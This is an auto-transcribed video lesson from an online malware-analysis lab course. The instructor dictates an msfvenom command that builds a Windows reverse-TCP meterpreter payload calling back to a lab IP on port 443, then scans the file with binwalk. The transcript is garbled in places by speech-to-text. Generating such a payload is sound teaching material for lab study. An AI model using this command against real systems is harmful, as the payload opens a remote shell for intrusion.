Analyze and Classify Malware Lab Part 1

Video Activity
Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *

Already have an account? Sign In »

3 hours 47 minutes
Video Transcription
Hi, everyone. Welcome back to the course. So in the last video, we haven't went ahead and wrapped up our discussion on malware. So we talked about things like viruses, worms. We also talked about root kits, which will actually do in one of our labs in this course.
And we went ahead and talked about things like Ransomware, which is popular in the news as well.
In this video, we're gonna start our first lab. So both of the labs in this course we're going to be just analyzing my worst or just using different techniques to take a look at some malware. Now, I do want to forewarn you that in the next lab the root Kit lab. It is using an older root kit. But the rationale behind that is to help you understand the fundamentals. So in this video, we're gonna go ahead and
start our lab on analyzing malware, and what we're going to do is create a malicious file,
and then we're gonna go ahead and do some different methods to analyze it.
So before we get started, I want to mention that in the resource of section of the course, you can finally step by step downloadable guides these air step by step guy's toe walking through the lab. So if you find that in this video I go too fast or too slow for you, feel free to watch the video, get the holistic view of how the lab's gonna work,
and then go ahead and download the lab guide and walk through it on your own.
So let's go ahead and get started now. You should be logged into the cyber site already. If you're able to view this course,
the next thing you want to do is search in the catalogue for the analyzing classified malware lab. So we search for analyzing Classify,
that should pull it up for us and you'll see it will be this one right here.
So great. And click on that.
Next up we want to do is click the launch button
and then we'll select the launch item. But not this next screen here.
Now, it might take a minute or two to go ahead and launch the lab. I'm gonna briefly pause a video while it launches the lab.
All right, so once the lab boots all the way up, the next thing we want to do is log into our Kelly Lennox machine.
So the way we do that is we're gonna use the user name of Root in the password of tour. So it's T. O. R. And both of these are all lower case. All we have to do
is click on this other option right here. That'll give us the log in screen. We type in route,
either click log in or just press enter on your keyboard and then t o r all lower case and same thing there, and it'll pull up the Cali desktop for us.
Now I want to Kelly desktop pulls up, we want to launch a terminal. So the way we do that on this particular Callie instance as we're going to select this little black box of the top of the screen, that's gonna be the terminal.
Just go ahead and select that there.
That's gonna open the terminal window for us and give us the prompt. Now we have a pretty long command. We're going to enter in to actually create the malicious file in this lab, and so it's gonna be this command right here. So we're to be typing in
MSF venom. All lower case, a space dash. Lower case a ah, space, Lower case X. And in the numbers 86 altogether.
We're gonna put another space and then a dash in lower case platform space windows, space dash lowercase P. And then you see the rest there. So let's go ahead and just get type in that in. That will take us just a moment here.
So go ahead and type that in. So it's gonna be MSF venom
again. All over. Case
a space dash Lower case a space lower case X
space dash platform
space Windows,
Space dash Lower case P
space And these were gonna be all over case Windows, Ford slash
Ford slash reverse and then the underscore than TCP. So we're basically just creating a reverse show.
We're gonna put another space, and then these were gonna be capitalized. So l host
the equal sign and then our i p address. We gotta specify the host I p address. So 192.168
0.0 dot 100 will put another space, and then we're gonna specify the port number, so l port all caps again
the equal sign and then Https were two special fei that with 4 43 which is the port number.
All right, so next we're gonna put a space dash lowercase f
space, Lower case e X e
dash lower case o
space And then finally malicious file dot e x e So malicious file
Dottie FC and that's all gonna be together.
So when you type that in double, check yourself Sometimes you might put in extra dash or something like that in there. So grand double check yourself. And then once you've done that, press the enter key to go ahead and run this command to create the file. Now, it might take a couple of minutes to create this file, So just pause the video and let it create the file on your side.
All right, so you see, on my end, it's gone ahead and created the malicious file and again, years might take a few minutes, so just be patient with it, and it should create the file. Now, if it doesn't give you this saved as malicious filed out, he etc. If you don't see that if you get some air message it's probably in the syntax. So go ahead and double check the command as you've typed it. Make sure you typed everything correctly.
Now, we can also verify that this file's been created by just using the L s command. So just listing the files.
And if we go ahead to our prompt here and type in L s,
we'll see that malicious file dot e x. He does exist.
All right, So I went to always clear when I'm typing in commands in Lenox. I always like to use the clear command just to make it a little pretty. You're on my screen. You don't have to do this step If you don't want to, You we'll just go and type in clear there.
So let's go back to our step by step lab guide here.
So we wanna we've gone ahead. And here in step seven, we entered that command and we created are malicious file. We just searched for it using the list command. We noticed that, yes, it is created, and hopefully it is on your end as well. If not policy video. Make sure you're typing in things correctly and go ahead and get that file created because you will need it for the rest of the lab.
I went ahead and typed in the clear commanders to clear up my terminal to make it a little prettier on my side. You don't have to do. Step nine is not a requirement, but I have it in there just to help you make it a little clearer as your typing in commands.
If you go down here to step number 10
we're gonna go ahead and just scan this file for common signatures. Now, I do want to stress that in this lab we're doing very basic stuff here, right? So if you're out there and you're trying to grab a piece of malware off line someplace, you may not be able to analyze it these this way, you may have to get creative, but
we're gonna go through the basics here in this course and just give you the fundamental so you can build upon that.
All right, so in step 10 we're gonna type in lower case been walk
space, a dash and a Capital B
and then the name of our malicious file. So in this case, we've named it malicious file dot e x e.
All right, so that's it. And then we're gonna take a look and see if we see any signatures at all.
So we do see signatures now, signatures for malware or for software in general are not going to be the same. Excuse me. Files are not going to the same is like you. Are I signing our name on something, right? So it's not gonna look like somebody's signed name. It's gonna be Hexi decimal or something equivalent to give us that signature.
So we see here that we do have some malicious signatures found, and these are things that should be known, right? These were things Ah, we find because we're using an older type of file.
So next we're gonna go to step 11 in our step by step guide here.
So step 11 word is gonna enter in this command.
We're gonna take a look at the output that we get.
So we're just gonna type in been walk again, which is a tool that we're using to analyze this
a space dash the number three
And then again, the same file name, right? So malicious file
dot He xy
just go ahead and run that there.
It might take a moment or so to go ahead and run that command. That's just gonna give us some basic information, and it's gonna give us a visual ization of this particular file. So if you've got a side by side comparison, you could take this image here and maneuver it around and see if it looks the same as the one you're analyzing or that you've analyzed in the past.
Uh, I'm a Star Trek fan, So I see this and I say, Ooh, that's the Borg ship. But anyways, I digress.
All right, so
in this video, we've gone ahead and we've created a malicious file. We've run a couple of commands to look at it. So number one we looked at if there's any malicious signatures with the file as well as we got a visual ization of it. And once you're done visualizing this here, just go ahead and ex out of that. That'll close that and you'll be back at the terminal prompt Here.
Now, in the next video, we'll go ahead and wrap up the lab. So we've got a couple of more commands. We're gonna take a look for up codes. We're also going to run a X if tool and just see what kind of information we get back along with hashing this particular file as well.
Up Next